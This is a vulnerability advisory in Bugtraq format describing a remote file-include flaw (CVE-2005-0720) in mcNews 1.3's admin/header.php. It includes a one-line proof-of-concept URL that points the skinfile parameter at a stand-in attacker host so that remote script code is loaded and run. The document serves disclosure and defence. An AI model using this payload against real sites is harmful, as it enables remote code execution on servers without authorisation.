BID:12776

mcNews Header.PHP Arbitrary File Include Vulnerability

Info

mcNews Header.PHP Arbitrary File Include Vulnerability

Bugtraq ID:	12776
Class:	Input Validation Error
CVE:	CVE-2005-0720
Remote:	Yes
Local:	No
Published:	Mar 10 2005 12:00AM
Updated:	May 12 2015 07:52PM
Credit:	Discovery of this vulnerability is credited to Filip Groszynski <[email protected]>.
Vulnerable:	McNews McNews 1.3

Not Vulnerable:

Discussion

mcNews Header.PHP Arbitrary File Include Vulnerability

mcNews is reportedly affected by a remote file-include vulnerability because the application fails to properly sanitize user-supplied input.

This issue is reported to affect mcNews 1.3; earlier versions may also be affected.

Exploit / POC

mcNews Header.PHP Arbitrary File Include Vulnerability

No exploit is required.

The following proof of concept is available:
http://www.example.com/mcNews/admin/header.php?skinfile=http://www.example.com/attackerScript

Solution / Fix

mcNews Header.PHP Arbitrary File Include Vulnerability

Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].

References

mcNews Header.PHP Arbitrary File Include Vulnerability

References:

mcNews Homepage (mcNews)
mcNews (skinfile) Remote File Include Vulnerability (ilker Kandemir)
PHP mcNews <= 1.3 arbitrary file inclusion (VXSfx) (Filip Groszynski )